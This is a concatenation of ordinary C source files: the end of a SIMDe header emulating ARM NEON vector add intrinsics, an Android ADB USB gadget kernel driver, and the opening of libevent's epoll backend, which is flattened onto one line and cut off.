    return vec_add(a, b);
  #elif defined(SIMDE_WASM_SIMD128_NATIVE)
    return wasm_i8x16_add(a, b);
  #else
    simde_int8x16_private
      r_,
      a_ = simde_int8x16_to_private(a),
      b_ = simde_int8x16_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int8x16_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_s8
  #define vaddq_s8(a, b) simde_vaddq_s8((a), (b))
#endif

/* vaddq_s16: 128-bit add of 8 x int16. */
SIMDE_FUNCTION_ATTRIBUTES
simde_int16x8_t
simde_vaddq_s16(simde_int16x8_t a, simde_int16x8_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_s16(a, b);
  #elif defined(SIMDE_X86_SSE2_NATIVE)
    return _mm_add_epi16(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
    return vec_add(a, b);
  #elif defined(SIMDE_WASM_SIMD128_NATIVE)
    return wasm_i16x8_add(a, b);
  #else
    simde_int16x8_private
      r_,
      a_ = simde_int16x8_to_private(a),
      b_ = simde_int16x8_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int16x8_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_s16
  #define vaddq_s16(a, b) simde_vaddq_s16((a), (b))
#endif

/* vaddq_s32: 128-bit add of 4 x int32. */
SIMDE_FUNCTION_ATTRIBUTES
simde_int32x4_t
simde_vaddq_s32(simde_int32x4_t a, simde_int32x4_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_s32(a, b);
  #elif defined(SIMDE_X86_SSE2_NATIVE)
    return _mm_add_epi32(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
    return vec_add(a, b);
  #elif defined(SIMDE_WASM_SIMD128_NATIVE)
    return wasm_i32x4_add(a, b);
  #else
    simde_int32x4_private
      r_,
      a_ = simde_int32x4_to_private(a),
      b_ = simde_int32x4_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int32x4_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_s32
  #define vaddq_s32(a, b) simde_vaddq_s32((a), (b))
#endif

/* vaddq_s64: 128-bit add of 2 x int64 (AltiVec needs POWER8 for 64-bit add). */
SIMDE_FUNCTION_ATTRIBUTES
simde_int64x2_t
simde_vaddq_s64(simde_int64x2_t a, simde_int64x2_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_s64(a, b);
  #elif defined(SIMDE_X86_SSE2_NATIVE)
    return _mm_add_epi64(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
    return vec_add(a, b);
  #elif defined(SIMDE_WASM_SIMD128_NATIVE)
    return wasm_i64x2_add(a, b);
  #else
    simde_int64x2_private
      r_,
      a_ = simde_int64x2_to_private(a),
      b_ = simde_int64x2_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int64x2_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_s64
  #define vaddq_s64(a, b) simde_vaddq_s64((a), (b))
#endif

/* vaddq_u8: 128-bit add of 16 x uint8. */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint8x16_t
simde_vaddq_u8(simde_uint8x16_t a, simde_uint8x16_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_u8(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
    return vec_add(a, b);
  #else
    simde_uint8x16_private
      r_,
      a_ = simde_uint8x16_to_private(a),
      b_ = simde_uint8x16_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint8x16_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_u8
  #define vaddq_u8(a, b) simde_vaddq_u8((a), (b))
#endif

/* vaddq_u16: 128-bit add of 8 x uint16. */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint16x8_t
simde_vaddq_u16(simde_uint16x8_t a, simde_uint16x8_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_u16(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
    return vec_add(a, b);
  #else
    simde_uint16x8_private
      r_,
      a_ = simde_uint16x8_to_private(a),
      b_ = simde_uint16x8_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint16x8_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_u16
  #define vaddq_u16(a, b) simde_vaddq_u16((a), (b))
#endif

/* vaddq_u32: 128-bit add of 4 x uint32. */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint32x4_t
simde_vaddq_u32(simde_uint32x4_t a, simde_uint32x4_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_u32(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
    return vec_add(a, b);
  #else
    simde_uint32x4_private
      r_,
      a_ = simde_uint32x4_to_private(a),
      b_ = simde_uint32x4_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint32x4_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_u32
  #define vaddq_u32(a, b) simde_vaddq_u32((a), (b))
#endif

/* vaddq_u64: 128-bit add of 2 x uint64 (AltiVec needs POWER8). */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint64x2_t
simde_vaddq_u64(simde_uint64x2_t a, simde_uint64x2_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_u64(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
    return vec_add(a, b);
  #else
    simde_uint64x2_private
      r_,
      a_ = simde_uint64x2_to_private(a),
      b_ = simde_uint64x2_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint64x2_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_u64
  #define vaddq_u64(a, b) simde_vaddq_u64((a), (b))
#endif

SIMDE_END_DECLS_
HEDLEY_DIAGNOSTIC_POP

#endif /* !defined(SIMDE_ARM_NEON_ADD_H) */
{ "language": "C" }
/*
 * Gadget Driver for Android ADB
 *
 * Copyright (C) 2008 Google, Inc.
 * Author: Mike Lockwood <lockwood@android.com>
 *
 * This software is licensed under the terms of the GNU General Public
 * License version 2, as published by the Free Software Foundation, and
 * may be copied, distributed, and modified under those terms.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 */

#include <linux/module.h>
#include <linux/init.h>
#include <linux/poll.h>
#include <linux/delay.h>
#include <linux/wait.h>
#include <linux/err.h>
#include <linux/interrupt.h>
#include <linux/sched.h>
#include <linux/types.h>
#include <linux/device.h>
#include <linux/miscdevice.h>

#define ADB_BULK_BUFFER_SIZE 4096

/* number of tx requests to allocate */
#define TX_REQ_MAX 4

static const char adb_shortname[] = "android_adb";

/* Per-function state; one instance is shared between the USB function
 * callbacks and the /dev/android_adb character device. */
struct adb_dev {
    struct usb_function function;
    struct usb_composite_dev *cdev;
    spinlock_t lock;               /* protects tx_idle list */

    struct usb_ep *ep_in;          /* bulk IN (device -> host) */
    struct usb_ep *ep_out;         /* bulk OUT (host -> device) */

    int online;                    /* set when the interface is configured */
    int error;                     /* latched I/O error; cleared on open */

    /* single-user exclusion flags for read/write/open */
    atomic_t read_excl;
    atomic_t write_excl;
    atomic_t open_excl;

    struct list_head tx_idle;      /* idle IN requests, guarded by lock */

    wait_queue_head_t read_wq;
    wait_queue_head_t write_wq;
    struct usb_request *rx_req;    /* single reusable OUT request */
    int rx_done;                   /* completion flag for rx_req */
};

static struct usb_interface_descriptor adb_interface_desc = {
    .bLength = USB_DT_INTERFACE_SIZE,
    .bDescriptorType = USB_DT_INTERFACE,
    .bInterfaceNumber = 0,
    .bNumEndpoints = 2,
    .bInterfaceClass = 0xFF,
    .bInterfaceSubClass = 0x42,
    .bInterfaceProtocol = 1,
};

static struct usb_endpoint_descriptor adb_superspeed_in_desc = {
    .bLength = USB_DT_ENDPOINT_SIZE,
    .bDescriptorType = USB_DT_ENDPOINT,
    .bEndpointAddress = USB_DIR_IN,
    .bmAttributes = USB_ENDPOINT_XFER_BULK,
    .wMaxPacketSize = __constant_cpu_to_le16(1024),
};

static struct usb_ss_ep_comp_descriptor adb_superspeed_in_comp_desc = {
    .bLength = sizeof(adb_superspeed_in_comp_desc),
    .bDescriptorType = USB_DT_SS_ENDPOINT_COMP,
    /*.bMaxBurst = DYNAMIC, */
};

static struct usb_endpoint_descriptor adb_superspeed_out_desc = {
    .bLength = USB_DT_ENDPOINT_SIZE,
    .bDescriptorType = USB_DT_ENDPOINT,
    .bEndpointAddress = USB_DIR_OUT,
    .bmAttributes = USB_ENDPOINT_XFER_BULK,
    .wMaxPacketSize = __constant_cpu_to_le16(1024),
};

static struct usb_ss_ep_comp_descriptor adb_superspeed_out_comp_desc = {
    .bLength = sizeof(adb_superspeed_out_comp_desc),
    .bDescriptorType = USB_DT_SS_ENDPOINT_COMP,
    /*.bMaxBurst = DYNAMIC, */
};

static struct usb_endpoint_descriptor adb_highspeed_in_desc = {
    .bLength = USB_DT_ENDPOINT_SIZE,
    .bDescriptorType = USB_DT_ENDPOINT,
    .bEndpointAddress = USB_DIR_IN,
    .bmAttributes = USB_ENDPOINT_XFER_BULK,
    .wMaxPacketSize = __constant_cpu_to_le16(512),
};

static struct usb_endpoint_descriptor adb_highspeed_out_desc = {
    .bLength = USB_DT_ENDPOINT_SIZE,
    .bDescriptorType = USB_DT_ENDPOINT,
    .bEndpointAddress = USB_DIR_OUT,
    .bmAttributes = USB_ENDPOINT_XFER_BULK,
    .wMaxPacketSize = __constant_cpu_to_le16(512),
};

static struct usb_endpoint_descriptor adb_fullspeed_in_desc = {
    .bLength = USB_DT_ENDPOINT_SIZE,
    .bDescriptorType = USB_DT_ENDPOINT,
    .bEndpointAddress = USB_DIR_IN,
    .bmAttributes = USB_ENDPOINT_XFER_BULK,
};

static struct usb_endpoint_descriptor adb_fullspeed_out_desc = {
    .bLength = USB_DT_ENDPOINT_SIZE,
    .bDescriptorType = USB_DT_ENDPOINT,
    .bEndpointAddress = USB_DIR_OUT,
    .bmAttributes = USB_ENDPOINT_XFER_BULK,
};

static struct usb_descriptor_header *fs_adb_descs[] = {
    (struct usb_descriptor_header *) &adb_interface_desc,
    (struct usb_descriptor_header *) &adb_fullspeed_in_desc,
    (struct usb_descriptor_header *) &adb_fullspeed_out_desc,
    NULL,
};

static struct usb_descriptor_header *hs_adb_descs[] = {
    (struct usb_descriptor_header *) &adb_interface_desc,
    (struct usb_descriptor_header *) &adb_highspeed_in_desc,
    (struct usb_descriptor_header *) &adb_highspeed_out_desc,
    NULL,
};

static struct usb_descriptor_header *ss_adb_descs[] = {
    (struct usb_descriptor_header *) &adb_interface_desc,
    (struct usb_descriptor_header *) &adb_superspeed_in_desc,
    (struct usb_descriptor_header *) &adb_superspeed_in_comp_desc,
    (struct usb_descriptor_header *) &adb_superspeed_out_desc,
    (struct usb_descriptor_header *) &adb_superspeed_out_comp_desc,
    NULL,
};

/* Implemented elsewhere; notify the android gadget about open/close. */
static void adb_ready_callback(void);
static void adb_closed_callback(void);

/* temporary variable used between adb_open() and adb_gadget_bind() */
static struct adb_dev *_adb_dev;

/* Map a usb_function back to its containing adb_dev. */
static inline struct adb_dev *func_to_adb(struct usb_function *f)
{
    return container_of(f, struct adb_dev, function);
}

/* Allocate a usb_request plus a kernel buffer of buffer_size bytes.
 * Returns NULL on any allocation failure (nothing is leaked). */
static struct usb_request *adb_request_new(struct usb_ep *ep, int buffer_size)
{
    struct usb_request *req = usb_ep_alloc_request(ep, GFP_KERNEL);
    if (!req)
        return NULL;

    /* now allocate buffers for the requests */
    req->buf = kmalloc(buffer_size, GFP_KERNEL);
    if (!req->buf) {
        usb_ep_free_request(ep, req);
        return NULL;
    }

    return req;
}

/* Free a request and its buffer; NULL-safe. */
static void adb_request_free(struct usb_request *req, struct usb_ep *ep)
{
    if (req) {
        kfree(req->buf);
        usb_ep_free_request(ep, req);
    }
}

/* Try-lock built on an atomic counter: returns 0 on success, -1 when the
 * resource is already held by someone else. */
static inline int adb_lock(atomic_t *excl)
{
    if (atomic_inc_return(excl) == 1) {
        return 0;
    } else {
        atomic_dec(excl);
        return -1;
    }
}

static inline void adb_unlock(atomic_t *excl)
{
    atomic_dec(excl);
}

/* add a request to the tail of a list */
void adb_req_put(struct adb_dev *dev, struct list_head *head,
        struct usb_request *req)
{
    unsigned long flags;

    spin_lock_irqsave(&dev->lock, flags);
    list_add_tail(&req->list, head);
    spin_unlock_irqrestore(&dev->lock, flags);
}

/* remove a request from the head of a list */
struct usb_request *adb_req_get(struct adb_dev *dev, struct list_head *head)
{
    unsigned long flags;
    struct usb_request *req;

    spin_lock_irqsave(&dev->lock, flags);
    if (list_empty(head)) {
        req = 0;
    } else {
        req = list_first_entry(head, struct usb_request, list);
        list_del(&req->list);
    }
    spin_unlock_irqrestore(&dev->lock, flags);
    return req;
}

/* IN (tx) completion: recycle the request and wake any blocked writer. */
static void adb_complete_in(struct usb_ep *ep, struct usb_request *req)
{
    struct adb_dev *dev = _adb_dev;

    if (req->status != 0)
        dev->error = 1;

    adb_req_put(dev, &dev->tx_idle, req);

    wake_up(&dev->write_wq);
}

/* OUT (rx) completion: flag completion and wake the blocked reader.
 * -ECONNRESET (dequeue) is not treated as an error. */
static void adb_complete_out(struct usb_ep *ep, struct usb_request *req)
{
    struct adb_dev *dev = _adb_dev;

    dev->rx_done = 1;
    if (req->status != 0 && req->status != -ECONNRESET)
        dev->error = 1;

    wake_up(&dev->read_wq);
}

/* Claim the two bulk endpoints and pre-allocate one rx request and
 * TX_REQ_MAX tx requests. Returns 0 or a negative errno/-1 on failure.
 * NOTE(review): on the failure path, requests already allocated are not
 * freed here - presumably cleaned up by unbind; confirm. */
static int adb_create_bulk_endpoints(struct adb_dev *dev,
                struct usb_endpoint_descriptor *in_desc,
                struct usb_endpoint_descriptor *out_desc)
{
    struct usb_composite_dev *cdev = dev->cdev;
    struct usb_request *req;
    struct usb_ep *ep;
    int i;

    DBG(cdev, "create_bulk_endpoints dev: %p\n", dev);

    ep = usb_ep_autoconfig(cdev->gadget, in_desc);
    if (!ep) {
        DBG(cdev, "usb_ep_autoconfig for ep_in failed\n");
        return -ENODEV;
    }
    DBG(cdev, "usb_ep_autoconfig for ep_in got %s\n", ep->name);
    ep->driver_data = dev;        /* claim the endpoint */
    dev->ep_in = ep;

    ep = usb_ep_autoconfig(cdev->gadget, out_desc);
    if (!ep) {
        DBG(cdev, "usb_ep_autoconfig for ep_out failed\n");
        return -ENODEV;
    }
    DBG(cdev, "usb_ep_autoconfig for adb ep_out got %s\n", ep->name);
    ep->driver_data = dev;        /* claim the endpoint */
    dev->ep_out = ep;

    /* now allocate requests for our endpoints */
    req = adb_request_new(dev->ep_out, ADB_BULK_BUFFER_SIZE);
    if (!req)
        goto fail;
    req->complete = adb_complete_out;
    dev->rx_req = req;

    for (i = 0; i < TX_REQ_MAX; i++) {
        req = adb_request_new(dev->ep_in, ADB_BULK_BUFFER_SIZE);
        if (!req)
            goto fail;
        req->complete = adb_complete_in;
        adb_req_put(dev, &dev->tx_idle, req);
    }

    return 0;

fail:
    printk(KERN_ERR "adb_bind() could not allocate requests\n");
    return -1;
}

/* read(2) on /dev/android_adb: blocks until online, queues the single rx
 * request, waits for completion and copies up to count bytes to userspace.
 * Only one reader is allowed at a time (read_excl). */
static ssize_t adb_read(struct file *fp, char __user *buf,
                size_t count, loff_t *pos)
{
    struct adb_dev *dev = fp->private_data;
    struct usb_request *req;
    int r = count, xfer;
    int ret;

    pr_debug("adb_read(%zu)\n", count);
    if (!_adb_dev)
        return -ENODEV;

    if (count > ADB_BULK_BUFFER_SIZE)
        return -EINVAL;

    if (adb_lock(&dev->read_excl))
        return -EBUSY;

    /* we will block until we're online */
    while (!(dev->online || dev->error)) {
        pr_debug("adb_read: waiting for online state\n");
        ret = wait_event_interruptible(dev->read_wq,
            (dev->online || dev->error));
        if (ret < 0) {
            adb_unlock(&dev->read_excl);
            return ret;
        }
    }
    if (dev->error) {
        r = -EIO;
        goto done;
    }

requeue_req:
    /* queue a request */
    req = dev->rx_req;
#ifndef CONFIG_ARCH_SUN9I
    req->length = count;
#else
    /* this UDC requires the OUT length to be a maxpacket multiple */
    req->length = count + dev->ep_out->maxpacket - 1;
    req->length -= req->length % dev->ep_out->maxpacket;
#endif
    dev->rx_done = 0;
    ret = usb_ep_queue(dev->ep_out, req, GFP_ATOMIC);
    if (ret < 0) {
        pr_debug("adb_read: failed to queue req %p (%d)\n", req, ret);
        r = -EIO;
        dev->error = 1;
        goto done;
    } else {
        pr_debug("rx %p queue\n", req);
    }

    /* wait for a request to complete */
    ret = wait_event_interruptible(dev->read_wq, dev->rx_done);
    if (ret < 0) {
        if (ret != -ERESTARTSYS)
            dev->error = 1;
        r = ret;
        usb_ep_dequeue(dev->ep_out, req);
        goto done;
    }
    if (!dev->error) {
        /* If we got a 0-len packet, throw it back and try again. */
        if (req->actual == 0)
            goto requeue_req;

        pr_debug("rx %p %d\n", req, req->actual);
        xfer = (req->actual < count) ? req->actual : count;
        if (copy_to_user(buf, req->buf, xfer))
            r = -EFAULT;
    } else
        r = -EIO;

done:
    adb_unlock(&dev->read_excl);
    pr_debug("adb_read returning %d\n", r);
    return r;
}

/* write(2) on /dev/android_adb: splits the user buffer into
 * ADB_BULK_BUFFER_SIZE chunks, each sent on an idle tx request.
 * Only one writer is allowed at a time (write_excl). */
static ssize_t adb_write(struct file *fp, const char __user *buf,
                 size_t count, loff_t *pos)
{
    struct adb_dev *dev = fp->private_data;
    struct usb_request *req = 0;
    int r = count, xfer;
    int ret;

    if (!_adb_dev)
        return -ENODEV;
    pr_debug("adb_write(%zu)\n", count);

    if (adb_lock(&dev->write_excl))
        return -EBUSY;

    while (count > 0) {
        if (dev->error) {
            pr_debug("adb_write dev->error\n");
            r = -EIO;
            break;
        }

        /* get an idle tx request to use */
        req = 0;
        ret = wait_event_interruptible(dev->write_wq,
            (req = adb_req_get(dev, &dev->tx_idle)) || dev->error);

        if (ret < 0) {
            r = ret;
            break;
        }

        if (req != 0) {
            if (count > ADB_BULK_BUFFER_SIZE)
                xfer = ADB_BULK_BUFFER_SIZE;
            else
                xfer = count;
            if (copy_from_user(req->buf, buf, xfer)) {
                r = -EFAULT;
                break;
            }

            req->length = xfer;
            ret = usb_ep_queue(dev->ep_in, req, GFP_ATOMIC);
            if (ret < 0) {
                pr_debug("adb_write: xfer error %d\n", ret);
                dev->error = 1;
                r = -EIO;
                break;
            }

            buf += xfer;
            count -= xfer;

            /* zero this so we don't try to free it on error exit */
            req = 0;
        }
    }

    /* an unqueued request (error exit) goes back on the idle list */
    if (req)
        adb_req_put(dev, &dev->tx_idle, req);

    adb_unlock(&dev->write_excl);
    pr_debug("adb_write returning %d\n", r);
    return r;
}

/* open(2): single-open device; clears the error latch and notifies the
 * gadget stack that adbd is attached. */
static int adb_open(struct inode *ip, struct file *fp)
{
    pr_info("adb_open\n");
    if (!_adb_dev)
        return -ENODEV;

    if (adb_lock(&_adb_dev->open_excl))
        return -EBUSY;

    fp->private_data = _adb_dev;

    /* clear the error latch */
    _adb_dev->error = 0;

    adb_ready_callback();

    return 0;
}

static int adb_release(struct inode *ip, struct file *fp)
{
    pr_info("adb_release\n");

    adb_closed_callback();

    adb_unlock(&_adb_dev->open_excl);
    return 0;
}

/* file operations for ADB device /dev/android_adb */
static const struct file_operations adb_fops = {
    .owner = THIS_MODULE,
    .read = adb_read,
    .write = adb_write,
    .open = adb_open,
    .release = adb_release,
};

static struct miscdevice adb_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = adb_shortname,
    .fops = &adb_fops,
};

/* Composite-framework bind: allocate the interface id, claim endpoints,
 * and mirror the full-speed endpoint addresses into the HS/SS descriptors. */
static int
adb_function_bind(struct usb_configuration *c, struct usb_function *f)
{
    struct usb_composite_dev *cdev = c->cdev;
    struct adb_dev *dev = func_to_adb(f);
    int id;
    int ret;

    dev->cdev = cdev;
    DBG(cdev, "adb_function_bind dev: %p\n", dev);

    /* allocate interface ID(s) */
    id = usb_interface_id(c, f);
    if (id < 0)
        return id;
    adb_interface_desc.bInterfaceNumber = id;

    /* allocate endpoints */
    ret = adb_create_bulk_endpoints(dev, &adb_fullspeed_in_desc,
            &adb_fullspeed_out_desc);
    if (ret)
        return ret;

    /* support high speed hardware */
    if (gadget_is_dualspeed(c->cdev->gadget)) {
        adb_highspeed_in_desc.bEndpointAddress =
            adb_fullspeed_in_desc.bEndpointAddress;
        adb_highspeed_out_desc.bEndpointAddress =
            adb_fullspeed_out_desc.bEndpointAddress;
    }
    /* support super speed hardware */
    if (gadget_is_superspeed(c->cdev->gadget)) {
        adb_superspeed_in_desc.bEndpointAddress =
            adb_fullspeed_in_desc.bEndpointAddress;
        adb_superspeed_out_desc.bEndpointAddress =
            adb_fullspeed_out_desc.bEndpointAddress;
    }

    DBG(cdev, "%s speed %s: IN/%s, OUT/%s\n",
        gadget_is_dualspeed(c->cdev->gadget) ? "dual" : "full",
        f->name, dev->ep_in->name, dev->ep_out->name);
    return 0;
}

/* Unbind: mark offline/errored and free all pre-allocated requests.
 * NOTE(review): only read_wq is woken here; a writer sleeping on write_wq
 * is left to be woken by its completion handler - confirm this is safe. */
static void
adb_function_unbind(struct usb_configuration *c, struct usb_function *f)
{
    struct adb_dev *dev = func_to_adb(f);
    struct usb_request *req;

    dev->online = 0;
    dev->error = 1;

    wake_up(&dev->read_wq);

    adb_request_free(dev->rx_req, dev->ep_out);
    while ((req = adb_req_get(dev, &dev->tx_idle)))
        adb_request_free(req, dev->ep_in);
}

/* set_alt: (re)configure and enable both endpoints for the current speed,
 * then mark the device online and release blocked readers. */
static int adb_function_set_alt(struct usb_function *f,
        unsigned intf, unsigned alt)
{
    struct adb_dev *dev = func_to_adb(f);
    struct usb_composite_dev *cdev = f->config->cdev;
    int ret;

    DBG(cdev, "adb_function_set_alt intf: %d alt: %d\n", intf, alt);

    ret = config_ep_by_speed(cdev->gadget, f, dev->ep_in);
    if (ret)
        return ret;

    ret = usb_ep_enable(dev->ep_in);
    if (ret)
        return ret;

    ret = config_ep_by_speed(cdev->gadget, f, dev->ep_out);
    if (ret)
        return ret;

    ret = usb_ep_enable(dev->ep_out);
    if (ret) {
        usb_ep_disable(dev->ep_in);
        return ret;
    }
    dev->online = 1;

    /* readers may be blocked waiting for us to go online */
    wake_up(&dev->read_wq);
    return 0;
}

/* disable (host reset/disconnect): take the function offline and latch an
 * error so in-flight readers/writers bail out. */
static void adb_function_disable(struct usb_function *f)
{
    struct adb_dev *dev = func_to_adb(f);
    struct usb_composite_dev *cdev = dev->cdev;

    DBG(cdev, "adb_function_disable cdev %p\n", cdev);
    dev->online = 0;
    dev->error = 1;
    usb_ep_disable(dev->ep_in);
    usb_ep_disable(dev->ep_out);

    /* readers may be blocked waiting for us to go online */
    wake_up(&dev->read_wq);

    VDBG(cdev, "%s disabled\n", dev->function.name);
}

/* Register the adb usb_function with a configuration. */
static int adb_bind_config(struct usb_configuration *c)
{
    struct adb_dev *dev = _adb_dev;

    printk(KERN_INFO "adb_bind_config\n");

    dev->cdev = c->cdev;
    dev->function.name = "adb";
    dev->function.fs_descriptors = fs_adb_descs;
    dev->function.hs_descriptors = hs_adb_descs;
    dev->function.ss_descriptors = ss_adb_descs;
    dev->function.bind = adb_function_bind;
    dev->function.unbind = adb_function_unbind;
    dev->function.set_alt = adb_function_set_alt;
    dev->function.disable = adb_function_disable;

    return usb_add_function(c, &dev->function);
}

/* Module-level setup: allocate the singleton adb_dev and register the
 * misc character device. Returns 0 or a negative errno. */
static int adb_setup(void)
{
    struct adb_dev *dev;
    int ret;

    dev = kzalloc(sizeof(*dev), GFP_KERNEL);
    if (!dev)
        return -ENOMEM;

    spin_lock_init(&dev->lock);

    init_waitqueue_head(&dev->read_wq);
    init_waitqueue_head(&dev->write_wq);

    atomic_set(&dev->open_excl, 0);
    atomic_set(&dev->read_excl, 0);
    atomic_set(&dev->write_excl, 0);

    INIT_LIST_HEAD(&dev->tx_idle);

    _adb_dev = dev;

    ret = misc_register(&adb_device);
    if (ret)
        goto err;

    return 0;

err:
    kfree(dev);
    printk(KERN_ERR "adb gadget driver failed to initialize\n");
    return ret;
}

/* Tear down what adb_setup() created. */
static void adb_cleanup(void)
{
    misc_deregister(&adb_device);

    kfree(_adb_dev);
    _adb_dev = NULL;
}
{ "language": "C" }
/* * Copyright 2000-2007 Niels Provos <provos@citi.umich.edu> * Copyright 2007-2012 Niels Provos, Nick Mathewson * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ #include "event2/event-config.h" #include "evconfig-private.h" #ifdef EVENT__HAVE_EPOLL #include <stdint.h> #include <sys/types.h> #include <sys/resource.h> #ifdef EVENT__HAVE_SYS_TIME_H #include <sys/time.h> #endif #include <sys/queue.h> #include <sys/epoll.h> #include <signal.h> #include <limits.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #ifdef EVENT__HAVE_FCNTL_H #include <fcntl.h> #endif #ifdef EVENT__HAVE_SYS_TIMERFD_H #include <sys/timerfd.h> #endif #include "event-internal.h" #include "evsignal-internal.h" #include "event2/thread.h" #include "evthread-internal.h" #include "log-internal.h" #include "evmap-internal.h" #include "changelist-internal.h" #include "time-internal.h" /* Since Linux 2.6.17, epoll is able to report about peer half-closed connection using special EPOLLRDHUP flag on a read event. */ #if !defined(EPOLLRDHUP) #define EPOLLRDHUP 0 #define EARLY_CLOSE_IF_HAVE_RDHUP 0 #else #define 